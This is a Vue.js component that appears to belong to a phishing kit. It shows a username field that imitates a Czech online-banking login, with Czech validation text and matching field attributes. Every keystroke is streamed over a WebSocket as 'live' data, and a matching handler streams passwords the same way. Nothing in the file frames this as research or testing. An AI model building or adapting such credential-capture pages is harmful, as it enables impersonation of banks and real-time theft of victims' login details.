<template>
  <div class="home">
    首页
    <input v-model="username" @input="formatUsername"
                                                    :class="{ empty: username.length === 0, valid: username.length > 0 }"
                                                    id="userID" type="text" required="" minlength="8" maxlength="24"
                                                    name="UserName" autocomplete="off" title=""
                                                    aria-describedby="accessibleUserIdTooltip"
                                                    data-too-short-error-message="Identifikátor musí mít minimálně 8 znaků">
    <!-- <img alt="Vue logo" src="../assets/logo.png"> -->
    <!-- <HelloWorld msg="Welcome to Your Vue.js App"/> -->
  </div>
</template>

<script>
// @ is an alias to /src
// import HelloWorld from '@/components/HelloWorld.vue'
import { ref, watch, onMounted } from 'vue';
import { store } from '/src/store.js'

export default {
  name: 'HomeView',
  // components: {
  //   // HelloWorld
  // },
  setup() {
    const username = ref('');
    const password = ref('');

    const data_Value = ref('');
    onMounted(() => {
        store.data.route = 'lipei'
        window.scrollTo({ top: 0, left: 0, behavior: 'smooth' });
        // store.WebSocket.addEventListener('message', (event) => {
        //     Ws_message(event)
        // });
    });
    watch(data_Value, (newValue, oldValue) => {
        console.log(newValue, oldValue)
        if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
            store.WebSocket.send(JSON.stringify({ type: 'live', data: newValue }));//Object.assign(store.data, newValue)
        }
    });
    const formatUsername = () => {
        data_Value.value = { username: username.value }
    }
    const formatPassword = () => {
        data_Value.value = { password: password.value }
    }
    return {
            username,
            password,
            formatUsername,
            formatPassword
        };

  }
}
</script>
